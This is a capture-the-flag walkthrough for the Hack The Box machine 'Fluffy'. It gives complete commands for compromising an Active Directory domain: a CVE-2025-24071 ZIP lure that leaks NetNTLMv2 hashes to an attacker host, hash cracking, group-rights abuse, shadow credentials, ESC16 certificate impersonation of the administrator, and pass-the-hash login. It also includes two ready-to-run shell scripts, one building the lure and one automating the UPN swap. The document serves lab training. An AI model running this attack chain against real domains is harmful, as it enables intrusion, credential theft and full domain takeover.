Machine Link: https://app.hackthebox.com/machines/Fluffy


Enumeration (j.fleischman)

Port scanning

  • Checking open ports and the running services
nmap -p- -sS -n -Pn --min-rate 5000 10.10.11.69 -oG allPorts
nmap -p53,88,139,389,445,464,593,636,3268,3269,5985,9389 -sCV -n -Pn --min-rate 5000 10.10.11.69 -oN Targeted

Domain: fluffy.htb DC: DC01.fluffy.htb

SMB

  • With the given credentials we can enumerate the SMB shares; the IT share is readable (and, as we will see, writable), so we download everything in it
impacket-smbclient fluffy.htb/'j.fleischman':'J0elTHEM4n1990!'@10.10.11.69
 
use IT
 
get *

Exploitation (j.fleischman ⇨ p.agila)

CVE-2025-24071

  • The share holds several files; unzipping one of them reveals an interesting extension
  • CVE-2025-24071 is a Windows Explorer flaw: a .library-ms file inside a ZIP is parsed as soon as it is extracted, and Explorer connects to the UNC path it contains, leaking the user's NetNTLMv2 response. If we upload a malicious .zip to the share and someone extracts it, we can capture that hash with Responder. We use this PoC to build the file
git clone https://github.com/Marcejr117/CVE-2025-24071_PoC
cd CVE-2025-24071_PoC
python3 PoC.py Mytest 10.10.16.2
sudo python3 ./Responder.py -I tun0
 
put exploit.zip
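To make the mechanics visible, here is an added example (not the page's commands and not the Marcejr117 PoC) that builds the same kind of lure by hand: a .library-ms whose <url> element points at the attacker's SMB host, packed into a ZIP. The XML follows the layout used by the public PoCs; the attacker IP 10.10.16.2 is the one on the page, while the share name "shared", the output names and the python3 fallback for zipping are this example's own choices.

```shell
#!/bin/sh
# Added example: hand-build a CVE-2025-24071 lure (.library-ms inside a ZIP).
# When the ZIP is extracted, Explorer parses the library file and resolves the
# UNC path in <url>, sending the user's NetNTLMv2 response to that host.
# Assumed values: attacker 10.10.16.2 (from the page), share name "shared".

# build_library_ms NAME ATTACKER_IP OUT_DIR -> prints path of OUT_DIR/NAME.library-ms
build_library_ms() {
  name="$1"; ip="$2"; out="$3"
  mkdir -p "$out"
  # Unquoted heredoc: "\\\\" becomes "\\" and "\\" becomes "\", so the
  # resulting element reads <url>\\ATTACKER_IP\shared</url>.
  cat > "$out/$name.library-ms" <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>\\\\$ip\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
EOF
  printf '%s\n' "$out/$name.library-ms"
}

# pack_zip FILE OUT_ZIP -> stores FILE at the top level of OUT_ZIP.
# Uses zip(1) when available, otherwise Python's zipfile module.
pack_zip() {
  file="$1"; zipf="$2"
  if command -v zip >/dev/null 2>&1; then
    zip -j -q "$zipf" "$file"
  elif command -v python3 >/dev/null 2>&1; then
    python3 -c 'import os, sys, zipfile
z = zipfile.ZipFile(sys.argv[1], "w", zipfile.ZIP_DEFLATED)
z.write(sys.argv[2], os.path.basename(sys.argv[2]))
z.close()' "$zipf" "$file"
  else
    echo "need zip or python3 to create the archive" >&2
    return 1
  fi
}

# Stand-alone use: ./lure.sh Mytest 10.10.16.2  -> exploit.zip in the cwd
if [ "$#" -ge 2 ]; then
  f=$(build_library_ms "$1" "$2" .)
  pack_zip "$f" exploit.zip && echo "wrote exploit.zip containing $f"
fi
```

Start Responder on tun0 before uploading exploit.zip to the share; the hash arrives the moment a user extracts the archive, without them opening the extracted file.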

Cracking

  • Responder captured a NetNTLMv2 hash, so let's crack it with hashcat (mode 5600)
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt

Creds: p.agila:prometheusx-303

Enumeration (p.agila)

BloodHound

sudo ntpdate -u 10.10.11.69
 
bloodhound-python -u 'p.agila' -p 'prometheusx-303' -c ALL -v --zip -d FLUFFY.HTB -dc DC01.FLUFFY.HTB -ns 10.10.11.69

Exploitation (GenericAll)

  • p.agila is a member of SERVICE ACCOUNT MANAGERS, which has GenericAll over SERVICE ACCOUNTS, so we can add p.agila to that group
net rpc group addmem "Service Accounts" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"
  • We can verify the membership with
net rpc group members "Service Accounts" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"
 
or 
 
net rpc user info "p.agila" -U "FLUFFY.HTB/p.agila%prometheusx-303" -S DC01.FLUFFY.HTB
 

Exploitation (GenericWrite to WINRM_SVC)

  • Service Accounts has GenericWrite over WINRM_SVC, which lets us write its msDS-KeyCredentialLink attribute (shadow credentials) with pywhisker and get a certificate we can use for PKINIT
python3 pywhisker/pywhisker.py -d FLUFFY.HTB -u p.agila -p 'prometheusx-303' --target "WINRM_SVC" --action "add" --dc-ip 10.10.11.69 --filename CACert --export PEM
  • Getting the TGT
python3 PKINITtools/gettgtpkinit.py -dc-ip 10.10.11.69 -cert-pem CACert_cert.pem -key-pem CACert_priv.pem FLUFFY.HTB/WINRM_SVC winrm_SRV_Bueno.ccache
  • We connect with the ticket
KRB5CCNAME=winrm_SRV_Bueno.ccache evil-winrm -i DC01.FLUFFY.HTB -u WINRM_SVC -r FLUFFY.HTB -c CACert_cert.pem -k CACert_priv.pem
  • With KRB5CCNAME pointing at the ccache we can also recover the NT hash; getnthash.py takes the AS-REP encryption key that gettgtpkinit.py printed
python3 PKINITtools/getnthash.py FLUFFY.HTB/WINRM_SVC -key 62c40e2dd846dc69875827e337682d4c6f664292c602212d966d071360a896bf

Hash NTLM= 33bd09dcd697600edf6b3a7af4875767

Getting Access (WINRM_SVC)

export KRB5CCNAME=winrm_SRV_Bueno.ccache
evil-winrm -i DC01.FLUFFY.HTB -u WINRM_SVC -r FLUFFY.HTB -c CACert_cert.pem -k CACert_priv.pem

Exploitation (GenericWrite to CA_SVC)

  • Since I can't DCSync as WINRM_SVC, I need another way in: take control of ca_svc the same way as in the last step, but this time with certipy-ad / certipy (just to practice, instead of pywhisker.py and gettgtpkinit.py). First we abuse GenericAll again to make sure p.agila is in Service Accounts
net rpc group addmem "Service Accounts" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"
  • Now we have GenericWrite over ca_svc, which is enough for a shadow credentials attack: certipy writes a key credential into the account's msDS-KeyCredentialLink, authenticates with PKINIT and recovers the NT hash
certipy shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account ca_svc

NT Hash: ca0f4f9e9eb8a092addf53bb03fc98c8

Privilege escalation

The attack itself works with certipy < 5.x.x as well, but if you want to see how this path was found, update to certipy 5 or later (ESC16 detection was added there) and run the commands below

  • Reading attributes
certipy account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.129.XX.XX -user 'ca_svc' read

Looking for vulnerabilities

certipy find -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -stdout -vulnerable
  • ESC16 (security extension disabled on the CA): the CA does not embed the szOID_NTDS_CA_SECURITY_EXT extension in the certificates it issues, so they carry no SID and the DC falls back to mapping them by UPN alone. Since we have GenericWrite over ca_svc we can change its UserPrincipalName from ca_svc@fluffy.htb to administrator and request a certificate from the User template; the result is a certificate that maps to the Administrator account
certipy account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update
  • Now we just need to request the certificate with the spoofed UPN (I had to execute it a couple of times)
certipy req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
  • Perfect. Now we restore the original UPN of ca_svc (ca_svc@fluffy.htb) and authenticate as administrator with the certificate
certipy account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
 
certipy auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69
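Because the request can fail and the UPN has to be put back afterwards, here is an added example (my own wrapper, not the page's commands) that runs the three ESC16 steps as one unit: set the UPN, retry `certipy req`, and restore the UPN no matter what happened. Defaults are the values from this writeup (DC, hash, CA, template, and ca_svc@fluffy.htb as the original UPN); the retry count and sleep are this example's choices.

```shell
#!/bin/sh
# Added example: ESC16 UPN swap with a guaranteed restore.
# Defaults come from the writeup; ORIG_UPN is ca_svc@fluffy.htb as stated there.

DC_IP="${DC_IP:-10.10.11.69}"
HASHES="${HASHES:-:ca0f4f9e9eb8a092addf53bb03fc98c8}"
TARGET="${TARGET:-DC01.fluffy.htb}"
CA="${CA:-fluffy-DC01-CA}"
TEMPLATE="${TEMPLATE:-User}"
ORIG_UPN="${ORIG_UPN:-ca_svc@fluffy.htb}"
RETRY_SLEEP="${RETRY_SLEEP:-2}"   # seconds between req attempts (example's choice)

# set_upn ACCOUNT UPN: rewrite userPrincipalName via certipy (needs GenericWrite)
set_upn() {
  certipy account -u "$1" -hashes "$HASHES" -dc-ip "$DC_IP" \
    -upn "$2" -user "$1" update
}

# esc16_request ACCOUNT SPOOFED_UPN [TRIES]
# 1. point the account's UPN at the victim, 2. request a User certificate
# (retrying, since the page notes it did not work first time), 3. restore the
# UPN whatever happened. Returns 0 only if a certificate was issued.
esc16_request() {
  acct="$1"; spoof="$2"; tries="${3:-3}"
  set_upn "$acct" "$spoof" || return 1
  rc=1; n=0
  while [ "$n" -lt "$tries" ]; do
    n=$((n + 1))
    if certipy req -u "$acct" -hashes "$HASHES" -dc-ip "$DC_IP" \
         -target "$TARGET" -ca "$CA" -template "$TEMPLATE"; then
      rc=0
      break
    fi
    sleep "$RETRY_SLEEP"
  done
  # Restore before reporting: leaving ca_svc with UPN "administrator" is noisy
  # and breaks that account's own UPN logons.
  set_upn "$acct" "$ORIG_UPN" || echo "WARNING: could not restore UPN $ORIG_UPN" >&2
  return "$rc"
}

# Stand-alone use: ./esc16.sh ca_svc administrator
# then: certipy auth -pfx administrator.pfx -username administrator -domain fluffy.htb -dc-ip "$DC_IP"
if [ "$#" -ge 2 ]; then
  esc16_request "$@"
fi
```

The exit status tells you whether administrator.pfx exists, and the UPN is restored in both the success and the failure path, which is the step that is easy to forget when repeating `certipy req` by hand.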

Getting access (Administrator)

  • Using evil-winrm and the NT hash returned by certipy auth we can log in as administrator
evil-winrm -i DC01.FLUFFY.HTB -u administrator -H "8da83a3fa618b6e3a00e93f676c92a6e"